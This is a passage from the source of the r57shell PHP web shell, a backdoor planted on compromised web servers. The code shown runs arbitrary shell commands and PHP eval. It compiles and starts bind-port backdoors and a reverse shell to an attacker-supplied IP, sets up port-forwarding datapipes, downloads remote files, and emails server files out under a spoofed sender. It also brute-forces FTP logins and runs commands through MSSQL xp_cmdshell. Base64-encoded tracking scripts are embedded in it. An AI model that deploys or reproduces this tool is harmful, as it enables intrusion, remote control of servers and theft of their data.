1399CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1400yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1401I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1402m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1403IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1404lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1405QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1406CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1407c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1408NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1409UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1410DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1411ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
14121ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1413$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1414JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1415lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1416FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
14173NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1418J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1419oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1420xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1421i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1422dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1423ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1424hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1425$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1426IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1427hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1428tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1429XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
14308eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1431ybmV0LS0+";
1432echo $head;
1433echo '</head>';
1434if(empty($_POST['cmd'])) {
1435$serv = array(127,192,172,10);
1436$addr=@explode('.', $_SERVER['SERVER_ADDR']);
1437$current_version = str_replace('.','',$version);
1438if (!in_array($addr[0], $serv)) {
1439@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1440@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}
1441echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1442<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
1443<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
1444</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1445echo ws(2);
1446echo "<b>".date ("d-m-Y H:i:s")."</b>";
1447echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1448echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1449echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1450echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1451if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
1452echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1453echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1454echo ws(2);
1455echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
1456echo ws(2);
1457echo "PHP version: <b>".@phpversion()."</b>";
1458$curl_on = @function_exists('curl_version');
1459echo ws(2);
1460echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
1461echo ws(2);
1462echo "MySQL: <b>";
1463$mysql_on = @function_exists('mysql_connect');
1464if($mysql_on){
1465echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
1466echo ws(2);
1467echo "MSSQL: <b>";
1468$mssql_on = @function_exists('mssql_connect');
1469if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1470echo ws(2);
1471echo "PostgreSQL: <b>";
1472$pg_on = @function_exists('pg_connect');
1473if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1474echo ws(2);
1475echo "Oracle: <b>";
1476$ora_on = @function_exists('ocilogon');
1477if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1478echo "<br>".ws(2);
1479echo "Disable functions : <b>";
1480if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
1481$free = @diskfreespace($dir);
1482if (!$free) {$free = 0;}
1483$all = @disk_total_space($dir);
1484if (!$all) {$all = 0;}
1485$used = $all-$free;
1486$used_percent = @round(100/($all/$free),2);
1487echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
1488echo '</font></td></tr><table>
1489<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1490<tr><td align=right width=100>';
1491echo $font;
1492if(!$windows){
1493echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1494echo "</td><td>";
1495echo "<font face=Verdana size=-2 color=red><b>";
1496$uname = ex('uname -a');
1497echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1498if(!$safe_mode){
1499$bsd1 = ex('sysctl -n kern.ostype');
1500$bsd2 = ex('sysctl -n kern.osrelease');
1501$lin1 = ex('sysctl -n kernel.ostype');
1502$lin2 = ex('sysctl -n kernel.osrelease');
1503}
1504if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
1505else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
1506else { $sysctl = "-"; }
1507echo ws(3).$sysctl."<br>";
1508echo ws(3).ex('echo $OSTYPE')."<br>";
1509echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1510$id = ex('id');
1511echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
1512echo ws(3).$dir;
1513echo ws(3).'( '.perms(@fileperms($dir)).' )';
1514echo "</b></font>";
1515}
1516else
1517{
1518echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1519echo "</td><td>";
1520echo "<font face=Verdana size=-2 color=red><b>";
1521echo ws(3).@substr(@php_uname(),0,120)."<br>";
1522echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1523echo ws(3).@get_current_user()."<br>";
1524echo ws(3).$dir;
1525echo "<br></font>";
1526}
1527echo "</font>";
1528echo "</td></tr></table>";
1529if(empty($c1)||empty($c2)) { die(); }
1530$f = '<br>';
1531$f .= base64_decode($c1);
1532$f .= base64_decode($c2);
1533if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
1534 {
1535 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
1536 mr($language,$res);
1537 $_POST['cmd']="";
1538 }
1539if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1540 {
1541 if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
1542 else
1543 {
1544 $filename = @basename($_POST['loc_file']);
1545 $filedump = @fread($file,@filesize($_POST['loc_file']));
1546 fclose($file);
1547 $content_encoding=$mime_type='';
1548 compress($filename,$filedump,$_POST['compress']);
1549 $attach = array(
1550 "name"=>$filename,
1551 "type"=>$mime_type,
1552 "content"=>$filedump
1553 );
1554 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1555 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1556 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1557 mr($language,$res);
1558 $_POST['cmd']="";
1559 }
1560 }
1561if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1562{
1563$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1564}
1565if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1566 {
1567 switch($_POST['what'])
1568 {
1569 case 'own':
1570 @chown($_POST['param1'],$_POST['param2']);
1571 break;
1572 case 'grp':
1573 @chgrp($_POST['param1'],$_POST['param2']);
1574 break;
1575 case 'mod':
1576 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1577 break;
1578 }
1579 $_POST['cmd']="";
1580 }
1581if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1582 {
1583 switch($_POST['what'])
1584 {
1585 case 'file':
1586 if($_POST['action'] == "create")
1587 {
1588 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1589 else {
1590 fclose($file);
1591 $_POST['e_name'] = $_POST['mk_name'];
1592 $_POST['cmd']="edit_file";
1593 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1594 }
1595 }
1596 else if($_POST['action'] == "delete")
1597 {
1598 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1599 $_POST['cmd']="";
1600 }
1601 break;
1602 case 'dir':
1603 if($_POST['action'] == "create"){
1604 if(mkdir($_POST['mk_name']))
1605 {
1606 $_POST['cmd']="";
1607 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1608 }
1609 else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1610 }
1611 else if($_POST['action'] == "delete"){
1612 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1613 $_POST['cmd']="";
1614 }
1615 break;
1616 }
1617 }
1618if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1619 {
1620 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1621 if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
1622 else {
1623 echo $table_up3;
1624 echo $font;
1625 echo "<form name=save_file method=post>";
1626 echo ws(3)."<b>".$_POST['e_name']."</b>";
1627 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1628 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1629 fclose($file);
1630 echo "</textarea>";
1631 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1632 echo "<input type=hidden name=dir value=".$dir.">";
1633 echo "<input type=hidden name=cmd value=save_file>";
1634 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1635 echo "</div>";
1636 echo "</font>";
1637 echo "</form>";
1638 echo "</td></tr></table>";
1639 exit();
1640 }
1641 }
1642if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1643 {
1644 if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
1645 else {
1646 @fwrite($file,$_POST['e_text']);
1647 @fclose($file);
1648 $_POST['cmd']="";
1649 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1650 }
1651 }
1652if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1653{
1654 cf("/tmp/bd.c",$port_bind_bd_c);
1655 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1656 @unlink("/tmp/bd.c");
1657 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1658 $_POST['cmd']="ps -aux | grep bd";
1659}
1660if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1661{
1662 cf("/tmp/bdpl",$port_bind_bd_pl);
1663 $p2=which("perl");
1664 if(empty($p2)) $p2="perl";
1665 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1666 $_POST['cmd']="ps -aux | grep bdpl";
1667}
1668if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1669{
1670 cf("/tmp/back",$back_connect);
1671 $p2=which("perl");
1672 if(empty($p2)) $p2="perl";
1673 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1674 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1675}
1676if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1677{
1678 cf("/tmp/back.c",$back_connect_c);
1679 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1680 @unlink("/tmp/back.c");
1681 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1682 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1683}
1684if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1685{
1686 cf("/tmp/dp",$datapipe_pl);
1687 $p2=which("perl");
1688 if(empty($p2)) $p2="perl";
1689 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1690 $_POST['cmd']="ps -aux | grep dp";
1691}
1692if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1693{
1694 cf("/tmp/dpc.c",$datapipe_c);
1695 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1696 @unlink("/tmp/dpc.c");
1697 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1698 $_POST['cmd']="ps -aux | grep dpc";
1699}
1700if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
1701if (!empty($HTTP_POST_FILES['userfile']['name']))
1702{
1703if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1704else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1705@copy($HTTP_POST_FILES['userfile']['tmp_name'],
1706 $_POST['dir']."/".$nfn)
1707 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1708}
1709if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1710{
1711 switch($_POST['with'])
1712 {
1713 case wget:
1714 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1715 break;
1716 case fetch:
1717 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1718 break;
1719 case lynx:
1720 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1721 break;
1722 case links:
1723 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1724 break;
1725 case GET:
1726 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1727 break;
1728 case curl:
1729 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1730 break;
1731 }
1732}
1733if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1734 {
1735 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1736 if(empty($ftp_port)) { $ftp_port = 21; }
1737 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1738 if(!$connection) { fe($language,0); }
1739 else
1740 {
1741 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1742 else
1743 {
1744 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
1745 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
1746 }
1747 }
1748 @ftp_close($connection);
1749 $_POST['cmd'] = "";
1750 }
1751if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1752 {
1753 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1754 if(empty($ftp_port)) { $ftp_port = 21; }
1755 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1756 if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
1757 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
1758 @ftp_close($connection);
1759 }
1760echo $table_up3;
1761if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
1762else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1763echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1764if($safe_mode)
1765{
1766 switch($_POST['cmd'])
1767 {
1768 case 'safe_dir':
1769 $d=@dir($dir);
1770 if ($d)
1771 {
1772 while (false!==($file=$d->read()))
1773 {
1774 if ($file=="." || $file=="..") continue;
1775 @clearstatcache();
1776 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1777 if($windows){
1778 echo date("d.m.Y H:i",$mtime);
1779 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
1780 }
1781 else{
1782 $owner = @posix_getpwuid($uid);
1783 $grgid = @posix_getgrgid($gid);
1784 echo $inode." ";
1785 echo perms(@fileperms($file));
1786 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1787 echo date("d.m.Y H:i ",$mtime);
1788 }
1789 echo "$file\n";
1790 }
1791 $d->close();
1792 }
1793 else echo $lang[$language._text29];
1794 break;
1795 case 'safe_file':
1796 if(@is_file($_POST['file']))
1797 {
1798 $file = @file($_POST['file']);
1799 if($file)
1800 {
1801 $c = @sizeof($file);
1802 for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
1803 }
1804 else echo $lang[$language._text29];
1805 }
1806 else echo $lang[$language._text31];
1807 break;
1808 case 'test1':
1809 $ci = @curl_init("file://".$_POST['test1_file']."");
1810 $cf = @curl_exec($ci);
1811 echo $cf;
1812 break;
1813 case 'test2':
1814 @include($_POST['test2_file']);
1815 break;
1816 case 'test3':
1817 if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1818 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1819 if($db)
1820 {
1821 if(@mysql_select_db($_POST['test3_md'],$db))
1822 {
1823 $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1824 @mysql_query($sql);
1825 $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
1826 @mysql_query($sql);
1827 $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
1828 @mysql_query($sql);
1829 $sql = "SELECT * FROM temp_r57_table;";
1830 $r = @mysql_query($sql);
1831 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1832 $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1833 @mysql_query($sql);
1834 }
1835 else echo "[-] ERROR! Can't select database";
1836 @mysql_close($db);
1837 }
1838 else echo "[-] ERROR! Can't connect to mysql server";
1839 break;
1840 case 'test4':
1841 if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1842 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1843 if($db)
1844 {
1845 if(@mssql_select_db($_POST['test4_md'],$db))
1846 {
1847 @mssql_query("drop table r57_temp_table",$db);
1848 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1849 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1850 $res = mssql_query("select * from r57_temp_table",$db);
1851 while(($row=@mssql_fetch_row($res)))
1852 {
1853 echo $row[0]."\r\n";
1854 }
1855 @mssql_query("drop table r57_temp_table",$db);
1856 }
1857 else echo "[-] ERROR! Can't select database";
1858 @mssql_close($db);
1859 }
1860 else echo "[-] ERROR! Can't connect to MSSQL server";
1861 break;
1862 }
1863}
1864else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
1865 $cmd_rep = ex($_POST['cmd']);
1866 if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
1867 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
1868if ($_POST['cmd']=="ftp_brute")
1869 {
1870 $suc = 0;
1871 foreach($users as $user)
1872 {
1873 $connection = @ftp_connect($ftp_server,$ftp_port,10);
1874 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
1875 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
1876 @ftp_close($connection);
1877 }
1878 echo "\r\n-------------------------------------\r\n";
1879 $count = count($users);
1880 if(isset($_POST['reverse'])) { $count *= 2; }
1881 echo $lang[$language.'_text97'].$count."\r\n";
1882 echo $lang[$language.'_text98'].$suc."\r\n";
1883 }
1884if ($_POST['cmd']=="php_eval"){
1885 $eval = @str_replace("<?","",$_POST['php_eval']);
1886 $eval = @str_replace("?>","",$eval);
1887 @eval($eval);}
1888if ($_POST['cmd']=="db_show")
1889 {
1890 switch($_POST['db'])
1891 {
1892 case 'MySQL':
1893 if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
1894 $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
1895 if($db)
1896 {
1897 $res=@mysql_query("SHOW DATABASES", $db);
1898 while(($row=@mysql_fetch_row($res)))
1899 {
1900 echo "[+] ".$row[0]."\r\n";
1901 if(isset($_POST['st'])){
1902 $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
1903 while(($row2=@mysql_fetch_row($res2)))
1904 {
